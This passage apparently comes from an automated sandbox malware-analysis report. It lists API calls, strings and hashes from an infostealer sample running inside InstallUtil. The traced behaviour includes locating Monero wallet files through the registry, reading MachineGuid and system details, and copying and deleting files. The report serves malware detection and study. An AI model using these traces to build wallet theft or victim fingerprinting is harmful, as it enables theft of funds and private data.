                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                  • String ID: .keys$\Monero\wallet.keys
                                                                                                                  • API String ID: 615783205-3586502688
                                                                                                                  • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                  • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                  • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                  • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                  APIs
                                                                                                                  • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                    • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                    • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                    • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                    • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                    • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                    • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                    • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                    • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                  • String ID: LzA
                                                                                                                  • API String ID: 1546541418-1388989900
                                                                                                                  • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                  • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                  • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                  • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                  APIs
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                  • _memset.LIBCMT ref: 0040FBC1
                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                    • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenProcess_memmove_memset
                                                                                                                  • String ID: N0ZWFt
                                                                                                                  • API String ID: 2647191932-431618156
                                                                                                                  • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                  • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                  • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                  • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                  • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                  • String ID: V@
                                                                                                                  • API String ID: 2311089104-383300688
                                                                                                                  • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                  • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                  • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                  • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00411607
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                  • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                  • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CharCloseOpenQueryValue_memset
                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                  • API String ID: 2235053359-1211650757
                                                                                                                  • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                  • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                  • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                  • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                  • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                  • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                  Strings
                                                                                                                  • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                  • wallet_path, xrefs: 00401A9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                  • API String ID: 3466090806-4244082812
                                                                                                                  • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                  • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                  • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                  • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: Windows 11
                                                                                                                  • API String ID: 3466090806-2517555085
                                                                                                                  • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                  • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                  • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                  • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                  • API String ID: 3466090806-1022791448
                                                                                                                  • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                  • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                  • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                  • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004156A4
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3891774339-0
                                                                                                                  • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                  • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                  • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                  • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                  • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                  • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 181426013-0
                                                                                                                  • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                  • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                  • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                  • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                  • _memset.LIBCMT ref: 004010D0
                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                  • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1859398019-0
                                                                                                                  • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                  • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                  • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                  • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                    • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                  • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                  • String ID: Unknown
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                  • wsprintfA.USER32 ref: 0041117A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                  • String ID: %d MB
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreatePointer
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C64C947
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C64C969
                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C64C9A9
                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C64C9C8
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C64C9E2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                  • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                  • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                  Strings
                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                  • API String ID: 2929475105-3463377506
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                  • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
